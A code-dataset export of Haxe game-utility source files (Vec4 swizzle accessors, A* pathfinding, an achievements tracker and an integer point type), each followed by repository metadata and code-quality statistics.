@:dox(hide) public var zwxw (get, never):Vec4; private function get_zwxw() return Vec4.get(z, w, x, w);
@:dox(hide) public var zwyx (get, never):Vec4; private function get_zwyx() return Vec4.get(z, w, y, x);
@:dox(hide) public var zwyy (get, never):Vec4; private function get_zwyy() return Vec4.get(z, w, y, y);
@:dox(hide) public var zwyz (get, never):Vec4; private function get_zwyz() return Vec4.get(z, w, y, z);
@:dox(hide) public var zwyw (get, never):Vec4; private function get_zwyw() return Vec4.get(z, w, y, w);
@:dox(hide) public var zwzx (get, never):Vec4; private function get_zwzx() return Vec4.get(z, w, z, x);
@:dox(hide) public var zwzy (get, never):Vec4; private function get_zwzy() return Vec4.get(z, w, z, y);
@:dox(hide) public var zwzz (get, never):Vec4; private function get_zwzz() return Vec4.get(z, w, z, z);
@:dox(hide) public var zwzw (get, never):Vec4; private function get_zwzw() return Vec4.get(z, w, z, w);
@:dox(hide) public var zwwx (get, never):Vec4; private function get_zwwx() return Vec4.get(z, w, w, x);
@:dox(hide) public var zwwy (get, never):Vec4; private function get_zwwy() return Vec4.get(z, w, w, y);
@:dox(hide) public var zwwz (get, never):Vec4; private function get_zwwz() return Vec4.get(z, w, w, z);
@:dox(hide) public var zwww (get, never):Vec4; private function get_zwww() return Vec4.get(z, w, w, w);
@:dox(hide) public var wxxx (get, never):Vec4; private function get_wxxx() return Vec4.get(w, x, x, x);
@:dox(hide) public var wxxy (get, never):Vec4; private function get_wxxy() return Vec4.get(w, x, x, y);
@:dox(hide) public var wxxz (get, never):Vec4; private function get_wxxz() return Vec4.get(w, x, x, z);
@:dox(hide) public var wxxw (get, never):Vec4; private function get_wxxw() return Vec4.get(w, x, x, w);
@:dox(hide) public var wxyx (get, never):Vec4; private function get_wxyx() return Vec4.get(w, x, y, x);
@:dox(hide) public var wxyy (get, never):Vec4; private function get_wxyy() return Vec4.get(w, x, y, y);
@:dox(hide) public var wxyz (get, never):Vec4; private function get_wxyz() return Vec4.get(w, x, y, z);
@:dox(hide) public var wxyw (get, never):Vec4; private function get_wxyw() return Vec4.get(w, x, y, w);
@:dox(hide) public var wxzx (get, never):Vec4; private function get_wxzx() return Vec4.get(w, x, z, x);
@:dox(hide) public var wxzy (get, never):Vec4; private function get_wxzy() return Vec4.get(w, x, z, y);
@:dox(hide) public var wxzz (get, never):Vec4; private function get_wxzz() return Vec4.get(w, x, z, z);
@:dox(hide) public var wxzw (get, never):Vec4; private function get_wxzw() return Vec4.get(w, x, z, w);
@:dox(hide) public var wxwx (get, never):Vec4; private function get_wxwx() return Vec4.get(w, x, w, x);
@:dox(hide) public var wxwy (get, never):Vec4; private function get_wxwy() return Vec4.get(w, x, w, y);
@:dox(hide) public var wxwz (get, never):Vec4; private function get_wxwz() return Vec4.get(w, x, w, z);
@:dox(hide) public var wxww (get, never):Vec4; private function get_wxww() return Vec4.get(w, x, w, w);
@:dox(hide) public var wyxx (get, never):Vec4; private function get_wyxx() return Vec4.get(w, y, x, x);
@:dox(hide) public var wyxy (get, never):Vec4; private function get_wyxy() return Vec4.get(w, y, x, y);
@:dox(hide) public var wyxz (get, never):Vec4; private function get_wyxz() return Vec4.get(w, y, x, z);
@:dox(hide) public var wyxw (get, never):Vec4; private function get_wyxw() return Vec4.get(w, y, x, w);
@:dox(hide) public var wyyx (get, never):Vec4; private function get_wyyx() return Vec4.get(w, y, y, x);
@:dox(hide) public var wyyy (get, never):Vec4; private function get_wyyy() return Vec4.get(w, y, y, y);
@:dox(hide) public var wyyz (get, never):Vec4; private function get_wyyz() return Vec4.get(w, y, y, z);
@:dox(hide) public var wyyw (get, never):Vec4; private function get_wyyw() return Vec4.get(w, y, y, w);
@:dox(hide) public var wyzx (get, never):Vec4; private function get_wyzx() return Vec4.get(w, y, z, x);
@:dox(hide) public var wyzy (get, never):Vec4; private function get_wyzy() return Vec4.get(w, y, z, y);
@:dox(hide) public var wyzz (get, never):Vec4; private function get_wyzz() return Vec4.get(w, y, z, z);
@:dox(hide) public var wyzw (get, never):Vec4; private function get_wyzw() return Vec4.get(w, y, z, w);
@:dox(hide) public var wywx (get, never):Vec4; private function get_wywx() return Vec4.get(w, y, w, x);
@:dox(hide) public var wywy (get, never):Vec4; private function get_wywy() return Vec4.get(w, y, w, y);
@:dox(hide) public var wywz (get, never):Vec4; private function get_wywz() return Vec4.get(w, y, w, z);
@:dox(hide) public var wyww (get, never):Vec4; private function get_wyww() return Vec4.get(w, y, w, w);
@:dox(hide) public var wzxx (get, never):Vec4; private function get_wzxx() return Vec4.get(w, z, x, x);
@:dox(hide) public var wzxy (get, never):Vec4; private function get_wzxy() return Vec4.get(w, z, x, y);
@:dox(hide) public var wzxz (get, never):Vec4; private function get_wzxz() return Vec4.get(w, z, x, z);
@:dox(hide) public var wzxw (get, never):Vec4; private function get_wzxw() return Vec4.get(w, z, x, w);
@:dox(hide) public var wzyx (get, never):Vec4; private function get_wzyx() return Vec4.get(w, z, y, x);
@:dox(hide) public var wzyy (get, never):Vec4; private function get_wzyy() return Vec4.get(w, z, y, y);
@:dox(hide) public var wzyz (get, never):Vec4; private function get_wzyz() return Vec4.get(w, z, y, z);
@:dox(hide) public var wzyw (get, never):Vec4; private function get_wzyw() return Vec4.get(w, z, y, w);
@:dox(hide) public var wzzx (get, never):Vec4; private function get_wzzx() return Vec4.get(w, z, z, x);
@:dox(hide) public var wzzy (get, never):Vec4; private function get_wzzy() return Vec4.get(w, z, z, y);
@:dox(hide) public var wzzz (get, never):Vec4; private function get_wzzz() return Vec4.get(w, z, z, z);
@:dox(hide) public var wzzw (get, never):Vec4; private function get_wzzw() return Vec4.get(w, z, z, w);
@:dox(hide) public var wzwx (get, never):Vec4; private function get_wzwx() return Vec4.get(w, z, w, x);
@:dox(hide) public var wzwy (get, never):Vec4; private function get_wzwy() return Vec4.get(w, z, w, y);
@:dox(hide) public var wzwz (get, never):Vec4; private function get_wzwz() return Vec4.get(w, z, w, z);
@:dox(hide) public var wzww (get, never):Vec4; private function get_wzww() return Vec4.get(w, z, w, w);
@:dox(hide) public var wwxx (get, never):Vec4; private function get_wwxx() return Vec4.get(w, w, x, x);
@:dox(hide) public var wwxy (get, never):Vec4; private function get_wwxy() return Vec4.get(w, w, x, y);
@:dox(hide) public var wwxz (get, never):Vec4; private function get_wwxz() return Vec4.get(w, w, x, z);
@:dox(hide) public var wwxw (get, never):Vec4; private function get_wwxw() return Vec4.get(w, w, x, w);
@:dox(hide) public var wwyx (get, never):Vec4; private function get_wwyx() return Vec4.get(w, w, y, x);
@:dox(hide) public var wwyy (get, never):Vec4; private function get_wwyy() return Vec4.get(w, w, y, y);
@:dox(hide) public var wwyz (get, never):Vec4; private function get_wwyz() return Vec4.get(w, w, y, z);
@:dox(hide) public var wwyw (get, never):Vec4; private function get_wwyw() return Vec4.get(w, w, y, w);
@:dox(hide) public var wwzx (get, never):Vec4; private function get_wwzx() return Vec4.get(w, w, z, x);
@:dox(hide) public var wwzy (get, never):Vec4; private function get_wwzy() return Vec4.get(w, w, z, y);
@:dox(hide) public var wwzz (get, never):Vec4; private function get_wwzz() return Vec4.get(w, w, z, z);
@:dox(hide) public var wwzw (get, never):Vec4; private function get_wwzw() return Vec4.get(w, w, z, w);
@:dox(hide) public var wwwx (get, never):Vec4; private function get_wwwx() return Vec4.get(w, w, w, x);
@:dox(hide) public var wwwy (get, never):Vec4; private function get_wwwy() return Vec4.get(w, w, w, y);
@:dox(hide) public var wwwz (get, never):Vec4; private function get_wwwz() return Vec4.get(w, w, w, z);
@:dox(hide) public var wwww (get, never):Vec4; private function get_wwww() return Vec4.get(w, w, w, w);
} | 38,430 | Vec4 | hx | en | haxe | code | {"qsc_code_num_words": 7001, "qsc_code_num_chars": 38430.0, "qsc_code_mean_word_length": 3.68718754, "qsc_code_frac_words_unique": 0.06241965, "qsc_code_frac_chars_top_2grams": 0.14530875, "qsc_code_frac_chars_top_3grams": 0.16921051, "qsc_code_frac_chars_top_4grams": 0.20825908, "qsc_code_frac_chars_dupe_5grams": 0.85279306, "qsc_code_frac_chars_dupe_6grams": 0.8167661, "qsc_code_frac_chars_dupe_7grams": 0.26954366, "qsc_code_frac_chars_dupe_8grams": 0.03091346, "qsc_code_frac_chars_dupe_9grams": 0.03091346, "qsc_code_frac_chars_dupe_10grams": 0.03091346, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02500914, "qsc_code_frac_chars_whitespace": 0.14577153, "qsc_code_size_file_byte": 38430.0, "qsc_code_num_lines": 420.0, "qsc_code_num_chars_line_max": 179.0, "qsc_code_num_chars_line_mean": 91.5, "qsc_code_frac_chars_alphabet": 0.76133179, "qsc_code_frac_chars_comments": 0.00947177, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00076181, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/AStar.hx | package zero.utilities;
import zero.utilities.IntPoint;
using Math;
/**
* A* Pathfinding algorithm with methods to simplify the output.
*
* **Usage**
*
* - Get a set of path nodes to traverse a 2D Int Array
*
* ```haxe
* AStar.get_path(my_2D_array, {
* start: [1, 1],
* end: [10, 10],
* passable: [0, 1, 2],
* });
* ```
*/
class AStar {
public static function get_path(map:Array<Array<Int>>, options:AStarOptions):Array<IntPoint> {
// Set defaults
if (options.mode == null) options.mode = CARDINAL_ONLY;
if (options.simplify == null) options.simplify = REMOVE_NODES_ON_PATH;
if (options.heuristic == null) options.heuristic = (i) -> 0;
// Check to see if Simplify Mode conflicts with Mode
if (options.mode == DIAGONAL && options.simplify == LINE_OF_SIGHT_NO_DIAGONAL) options.mode = CARDINAL_ONLY;
// Create start and end nodes
var start_node = get_node(options.start);
var end_node = get_node(options.end);
// Initialize lists
var open:Array<Node> = [start_node];
var closed:Array<Node> = [];
// Loop until end is found
while (open.length > 0) {
// Find current node, remove from open, add to closed
open.sort(sort_nodes);
var current_node = open.shift();
closed.push(current_node);
// Check if goal
if (current_node.position.equals(options.end)) {
var path = [];
var current = current_node;
while (current != null) {
path.unshift(current.position);
current = current.parent;
}
for (node in open) destroy_node(node);
path = simplify(path, map, options.simplify, options.passable);
return path;
}
// Generate children
var children:Array<Node> = [];
var new_positions:Array<IntPoint> = switch options.mode {
case CARDINAL_ONLY: [[0, -1], [0, 1], [-1, 0], [1, 0]];
case DIAGONAL: [[0, -1], [0, 1], [-1, 0], [1, 0], [-1, -1], [1, -1], [-1, 1], [1, 1]];
}
for (p in new_positions) {
var node_pos = current_node.position + p;
if (validate_position(node_pos, map, options.passable)) children.push({
position: node_pos,
parent: current_node,
f: 0, h: 0, g: 0
});
}
// Loop through children
for (node in children) {
// Check if child exists in closed list
if (in_closed(closed, node)) continue;
// Generate costs
node.g = current_node.g + 1;
node.h = node.position.distance(end_node.position) + options.heuristic(map[node.position.y][node.position.x]);
node.f = node.g + node.h;
// Check if child exists in open list
if (in_open(open, node)) continue;
open.push(node);
}
}
// Recycle points and return empty list - end is not reachable
for (node in open) destroy_node(node);
for (node in closed) destroy_node(node);
return [];
}
/**
Print out a visual of where the path nodes lie on a map
**/
public static function print(map:Array<Array<Int>>, path:Array<IntPoint>, passable:Array<Int>) {
var node_markers = '①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ';
var arr = [for (row in map) [for (i in row) passable.indexOf(i) >= 0 ? ' ' : '⬛' ]];
for (i in 0...path.length) arr[path[i].y][path[i].x] = node_markers.charAt(i % node_markers.length);
for (row in arr) trace(row.join('.'));
}
static function destroy_node(node:Node) {
node.position.put();
node = null;
}
static function in_closed(closed:Array<Node>, node:Node):Bool {
for (closed_node in closed) if (node.position.equals(closed_node.position)) return true;
return false;
}
static function in_open(open:Array<Node>, node:Node):Bool {
for (open_node in open) if (node.position.equals(open_node.position)) {
if (node.g < open_node.g) open_node.g = node.g;
return true;
}
return false;
}
static function validate_position(p:IntPoint, map:Array<Array<Int>>, passable:Array<Int>):Bool {
return p.y > 0 && p.x > 0 && p.y < map.length && p.x < map[p.y].length && passable.indexOf(map[p.y][p.x]) >= 0;
}
static function sort_nodes(n1:Node, n2:Node):Int {
return n1.f < n2.f ? -1 : n1.f > n2.f ? 1 : 0;
}
static function get_node(position:IntPoint, ?parent:Node):Node {
return {
position: position,
parent: parent,
g: 0,
h: 0,
f: 0
}
}
static function simplify(points:Array<IntPoint>, map:Array<Array<Int>>, mode:EAStarSimplifyMode, passable:Array<Int>):Array<IntPoint> {
return switch mode {
case NONE: points;
case REMOVE_NODES_ON_PATH: remove_nodes_on_path(points, map);
case LINE_OF_SIGHT: los_simplify(points, map, passable);
case LINE_OF_SIGHT_NO_DIAGONAL: los_nd_simplify(points, map, passable);
}
}
static function remove_nodes_on_path(points:Array<IntPoint>, map:Array<Array<Int>>):Array<IntPoint> {
if (points.length <= 1) return points;
var last = points.shift();
var next = points.shift();
var v = next - last;
var out = [last];
while (points.length > 0) {
last = next;
next = points.shift();
var v2 = next - last;
if (!v.equals(v2)) out.push(last.copy());
last.put();
v = v2;
}
out.push(next);
return out;
}
static function los_simplify(points:Array<IntPoint>, map:Array<Array<Int>>, passable:Array<Int>):Array<IntPoint> {
var last = points.shift();
var current = points.shift();
var next = points.shift();
var out = [last];
while (points.length > 0) {
if (los(last, next, map, passable)) {
var t = current;
current = next;
next = points.shift();
t.put();
}
else {
var t = last;
out.push(current);
last = current;
t.put();
}
}
out.push(next);
return out;
}
/**
Check line of sight, note that the passable array here may be different than the passable array for `get_path()` in case you want objects that you can see through but not walk through (i.e. glass, tables, etc)!
**/
public static function los(p1:IntPoint, p2:IntPoint, map:Array<Array<Int>>, passable:Array<Int>):Bool {
var d = p2 - p1;
var s:IntPoint = [ (p1.x < p2.x) ? 1 : -1, (p1.y < p2.y) ? 1 : -1 ];
var next = p1 + 0;
var dist:Float = d.length;
while (next.x != p2.x || next.y != p2.y)
{
if (passable.indexOf(map[next.y][next.x]) == -1) {
d.put();
s.put();
next.put();
return false;
}
if ((d.y * (next.x - p1.x + s.x) - d.x * (next.y - p1.y)).abs() / dist < 0.5) next.x += s.x;
else if((d.y * (next.x - p1.x) - d.x * (next.y - p1.y + s.y)).abs() / dist < 0.5) next.y += s.y;
else next = next + s;
}
d.put();
s.put();
next.put();
return true;
}
static function los_nd_simplify(points:Array<IntPoint>, map:Array<Array<Int>>, passable:Array<Int>):Array<IntPoint> {
var last = points.shift();
var current = points.shift();
var next = points.shift();
var out = [last.copy()];
while (points.length > 0) {
if (los_no_diagonal(last.copy(), next, map, passable)) {
current.copy_from(next);
next = points.shift();
}
else {
out.push(current.copy());
last.copy_from(current);
}
}
out.push(next.copy());
return out;
}
static function los_no_diagonal(p1:IntPoint, p2:IntPoint, map:Array<Array<Int>>, passable:Array<Int>):Bool {
var dx = (p2.x - p1.x).abs().floor();
var dy = (p2.y - p1.y).abs().floor();
var sx = p1.x < p2.x ? 1 : -1;
var sy = p1.y < p2.y ? 1 : -1;
var err = dx - dy;
var e2:Int;
while (!p1.equals(p2)) {
if (passable.indexOf(map[p1.y][p1.x]) == -1) {
p1.put();
return false;
}
e2 = err * 2;
if (dy > dx) {
if (e2 > -dy) {
err -= dy;
p1.x += sx;
}
else if (e2 < dx) {
err += dx;
p1.y += sy;
}
}
else {
if (e2 < dx) {
err += dx;
p1.y += sy;
}
else if (e2 > -dy) {
err -= dy;
p1.x += sx;
}
}
}
p1.put();
return true;
}
}
typedef AStarOptions = {
start:IntPoint,
end:IntPoint,
passable:Array<Int>,
?mode:EAStarMode,
?heuristic:Int -> Int,
?simplify:EAStarSimplifyMode,
}
enum EAStarMode {
CARDINAL_ONLY;
DIAGONAL;
}
enum EAStarSimplifyMode {
NONE;
REMOVE_NODES_ON_PATH;
LINE_OF_SIGHT;
LINE_OF_SIGHT_NO_DIAGONAL;
}
typedef Node = {
position:IntPoint,
g:Float,
h:Float,
f:Float,
?parent:Node,
} | 8,136 | AStar | hx | en | haxe | code | {"qsc_code_num_words": 1206, "qsc_code_num_chars": 8136.0, "qsc_code_mean_word_length": 4.12437811, "qsc_code_frac_words_unique": 0.15091211, "qsc_code_frac_chars_top_2grams": 0.02734218, "qsc_code_frac_chars_top_3grams": 0.02352232, "qsc_code_frac_chars_top_4grams": 0.02895054, "qsc_code_frac_chars_dupe_5grams": 0.27121029, "qsc_code_frac_chars_dupe_6grams": 0.21109771, "qsc_code_frac_chars_dupe_7grams": 0.17310012, "qsc_code_frac_chars_dupe_8grams": 0.11560113, "qsc_code_frac_chars_dupe_9grams": 0.09811017, "qsc_code_frac_chars_dupe_10grams": 0.08926417, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0205072, "qsc_code_frac_chars_whitespace": 0.21484759, "qsc_code_size_file_byte": 8136.0, "qsc_code_num_lines": 313.0, "qsc_code_num_chars_line_max": 213.0, "qsc_code_num_chars_line_mean": 25.99361022, "qsc_code_frac_chars_alphabet": 0.7463995, "qsc_code_frac_chars_comments": 0.11983776, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.2125, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01047194, "qsc_code_frac_chars_long_word_length": 0.01005306, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/Achievements.hx | package zero.utilities;
using zero.utilities.EventBus;
using Std;
/**
* Simple Bare-bones Achievements framework.
*
* **Usage:**
*
* - import it into your project `import zero.utilities.Achievements;`
* - also use EventBus - `using zero.utilities.EventBus;`
* - Set data from Map<String, Bool> (either to initialize Achievements or use saved data) using `Achievements.set_data(my_map);`
* - Add listeners for individual achievements using `Achievements.listen('my achievement');` (also works with enums!)
* - Trigger achievements using `"my achievement".dispatch();`
* - Make sure to save your achievement data - you can retrive it with `Achievements.get_data();`
*/
class Achievements
{
static var data:Map<String, Bool>;
static var callback:String -> Void = (s) -> {};
public static function get_data():Map<String, Bool> return data;
public static function set_data(map:Map<Dynamic, Bool>) data = [ for (key in map.keys()) Std.string(key) => map[key] ];
public static function set_callback(fn:String -> Void) callback = fn;
public static function get_achievement(name:String) {
if (!data.exists(name)) return trace('Achievement does not exist!');
if (data[name]) return;
data.set(name, true);
callback(name);
}
public static function listen(name:String) ((?_) -> get_achievement(name.string())).listen(name);
} | 1,350 | Achievements | hx | en | haxe | code | {"qsc_code_num_words": 179, "qsc_code_num_chars": 1350.0, "qsc_code_mean_word_length": 5.34078212, "qsc_code_frac_words_unique": 0.39664804, "qsc_code_frac_chars_top_2grams": 0.06276151, "qsc_code_frac_chars_top_3grams": 0.10460251, "qsc_code_frac_chars_top_4grams": 0.05439331, "qsc_code_frac_chars_dupe_5grams": 0.0, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0, "qsc_code_frac_chars_whitespace": 0.14814815, "qsc_code_size_file_byte": 1350.0, "qsc_code_num_lines": 38.0, "qsc_code_num_chars_line_max": 130.0, "qsc_code_num_chars_line_mean": 35.52631579, "qsc_code_frac_chars_alphabet": 0.83130435, "qsc_code_frac_chars_comments": 0.45407407, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.03658537, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/IntPoint.hx | package zero.utilities;
using Math;
/**
* A basic point consisting of two Integers - X and Y
*
* **Usage:**
*
* - Initialize using IntPoint.get() `var point = IntPoint.get(0, 0);`
* - Or with an array `var point:IntPoint = [0, 1];`
* - Recycle points when you're done with them: `my_point.put()`
*/
abstract IntPoint(Array<Int>)
{
// Array creation/access
@:from static function from_array_int(input:Array<Int>) return IntPoint.get(input[0], input[1]);
@:arrayAccess function arr_set(n:Int, v:Int) n < 0 || n > 1 ? return : this[n] = v;
@:arrayAccess function arr_get(n:Int):Int return this[n.min(1).max(0).floor()];
// Pooling
static var pool:Array<IntPoint> = [];
public static function get(x:Int = 0, y:Int = 0):IntPoint return pool != null && pool.length > 0 ? pool.shift().set(x, y) : new IntPoint(x, y);
public inline function put()
{
pool.push(cast this);
this = null;
}
inline function new(x:Int = 0, y:Int = 0) this = [x, y];
public inline function set(x:Int = 0, y:Int = 0) {
this[0] = x;
this[1] = y;
return cast this;
}
public var x(get, set):Int;
inline function get_x() return this[0];
inline function set_x(v) return this[0] = v;
public var y(get, set):Int;
inline function get_y() return this[1];
inline function set_y(v) return this[1] = v;
public var length(get, never):Float;
inline function get_length() return (x*x + y*y).sqrt();
public var angle(get, never):Float;
inline function get_angle() return ((Math.atan2(y, x) * (180 / Math.PI)) % 360 + 360) % 360;
public inline function copy_from(p:IntPoint):IntPoint return set(p.x, p.y);
public inline function copy():IntPoint return IntPoint.get(x, y);
public inline function equals(p:IntPoint):Bool return x == p.x && y == p.y;
public inline function distance(p:IntPoint):Float return (p - this).length;
public inline function toString():String return 'x: $x | y: $y';
// Operator Overloads
@:op(A + B) static function add(v1:IntPoint, v2:IntPoint):IntPoint return IntPoint.get(v1.x + v2.x, v1.y + v2.y);
@:op(A + B) static function add_int(v:IntPoint, n:Int):IntPoint return IntPoint.get(v.x + n, v.y + n);
@:op(A - B) static function subtract(v1:IntPoint, v2:IntPoint):IntPoint return IntPoint.get(v1.x - v2.x, v1.y - v2.y);
@:op(A - B) static function subtract_int(v:IntPoint, n:Int):IntPoint return IntPoint.get(v.x - n, v.y - n);
@:op(A * B) static function multiply(v1:IntPoint, v2:IntPoint):IntPoint return IntPoint.get(v1.x * v2.x, v1.y * v2.y);
@:op(A * B) static function multiply_int(v:IntPoint, n:Int):IntPoint return IntPoint.get(v.x * n, v.y * n);
@:op(A % B) static function mod(v1:IntPoint, v2:IntPoint):IntPoint return IntPoint.get(v1.x % v2.x, v1.y % v2.y);
@:op(A % B) static function mod_int(v:IntPoint, n:Int):IntPoint return IntPoint.get(v.x % n, v.y % n);
} | 2,820 | IntPoint | hx | en | haxe | code | {"qsc_code_num_words": 487, "qsc_code_num_chars": 2820.0, "qsc_code_mean_word_length": 3.84188912, "qsc_code_frac_words_unique": 0.18069815, "qsc_code_frac_chars_top_2grams": 0.10475681, "qsc_code_frac_chars_top_3grams": 0.0908605, "qsc_code_frac_chars_top_4grams": 0.12025655, "qsc_code_frac_chars_dupe_5grams": 0.47247461, "qsc_code_frac_chars_dupe_6grams": 0.40299305, "qsc_code_frac_chars_dupe_7grams": 0.30464992, "qsc_code_frac_chars_dupe_8grams": 0.28968466, "qsc_code_frac_chars_dupe_9grams": 0.28968466, "qsc_code_frac_chars_dupe_10grams": 0.28968466, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02535926, "qsc_code_frac_chars_whitespace": 0.16099291, "qsc_code_size_file_byte": 2820.0, "qsc_code_num_lines": 68.0, "qsc_code_num_chars_line_max": 145.0, "qsc_code_num_chars_line_mean": 41.47058824, "qsc_code_frac_chars_alphabet": 0.76542688, "qsc_code_frac_chars_comments": 0.11595745, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00521251, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, 